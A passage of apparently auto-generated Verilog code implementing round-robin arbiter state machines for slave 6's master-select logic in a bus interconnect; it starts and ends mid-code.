                        s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[6] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[7] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[0] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[1] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[2] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant4:
        begin
            if (  !( s6_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[5] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[6] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[7] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[0] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[1] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[2] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[3] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant5:
        begin
            if (  !( s6_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[6] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[7] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[0] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[1] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[2] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[3] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[4] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant6:
        begin
            if (  !( s6_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[7] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[0] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[1] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[2] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[3] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[4] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[5] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant7:
        begin
            if (  !( s6_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[0] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[1] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[2] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[3] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[4] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[5] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[6] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s6_msel_arb1_req = { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd1 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd1 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd1 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd1 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd1 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd1 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd1 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s6_msel_arb1_state <= s6_msel_arb1_grant0;
        end
        else
        begin 
            s6_msel_arb1_state <= s6_msel_arb1_next_state;
        end
    end
    always @ (  s6_msel_arb1_state or  { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd1 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd1 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd1 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd1 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd1 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd1 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd1 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s6_msel_arb1_next_state = s6_msel_arb1_state;
        case ( s6_msel_arb1_state ) 
        s6_msel_arb1_grant0:
        begin
            if (  !( s6_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[1] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[2] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[3] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[4] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[5] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[6] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[7] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant1:
        begin
            if (  !( s6_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[2] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[3] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[4] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[5] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[6] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[7] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[0] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant2:
        begin
            if (  !( s6_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[3] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[4] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[5] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[6] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[7] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[0] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[1] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant3:
        begin
            if (  !( s6_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[4] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[5] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[6] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[7] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[0] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[1] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[2] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant4:
        begin
            if (  !( s6_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[5] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[6] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[7] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[0] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[1] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[2] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[3] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant5:
        begin
            if (  !( s6_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[6] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[7] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[0] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[1] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[2] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[3] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[4] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant6:
        begin
            if (  !( s6_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[7] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[0] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[1] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[2] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[3] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[4] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[5] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb1_grant7:
        begin
            if (  !( s6_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s6_msel_arb1_req[0] ) 
                begin
                    s6_msel_arb1_next_state = s6_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s6_msel_arb1_req[1] ) 
                    begin
                        s6_msel_arb1_next_state = s6_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s6_msel_arb1_req[2] ) 
                        begin
                            s6_msel_arb1_next_state = s6_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s6_msel_arb1_req[3] ) 
                            begin
                                s6_msel_arb1_next_state = s6_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s6_msel_arb1_req[4] ) 
                                begin
                                    s6_msel_arb1_next_state = s6_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb1_req[5] ) 
                                    begin
                                        s6_msel_arb1_next_state = s6_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb1_req[6] ) 
                                        begin
                                            s6_msel_arb1_next_state = s6_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s6_msel_arb2_req = { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd2 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd2 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd2 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd2 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd2 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd2 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd2 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s6_msel_arb2_state <= s6_msel_arb2_grant0;
        end
        else
        begin 
            s6_msel_arb2_state <= s6_msel_arb2_next_state;
        end
    end
    always @ (  s6_msel_arb2_state or  { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd2 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd2 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd2 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd2 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd2 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd2 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd2 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s6_msel_arb2_next_state = s6_msel_arb2_state;
        case ( s6_msel_arb2_state ) 
        s6_msel_arb2_grant0:
        begin
            if (  !( s6_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[1] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[2] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[3] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[4] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[5] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[6] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[7] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant1:
        begin
            if (  !( s6_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[2] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[3] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[4] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[5] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[6] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[7] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[0] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant2:
        begin
            if (  !( s6_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[3] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[4] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[5] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[6] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[7] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[0] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[1] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant3:
        begin
            if (  !( s6_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[4] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s6_msel_arb2_req[5] ) 
                    begin
                        s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s6_msel_arb2_req[6] ) 
                        begin
                            s6_msel_arb2_next_state = s6_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s6_msel_arb2_req[7] ) 
                            begin
                                s6_msel_arb2_next_state = s6_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s6_msel_arb2_req[0] ) 
                                begin
                                    s6_msel_arb2_next_state = s6_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb2_req[1] ) 
                                    begin
                                        s6_msel_arb2_next_state = s6_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb2_req[2] ) 
                                        begin
                                            s6_msel_arb2_next_state = s6_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb2_grant4:
        begin
            if (  !( s6_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s6_msel_arb2_req[5] ) 
                begin
                    s6_msel_arb2_next_state = s6_msel_arb2_grant5;
                end
                else
                begin 
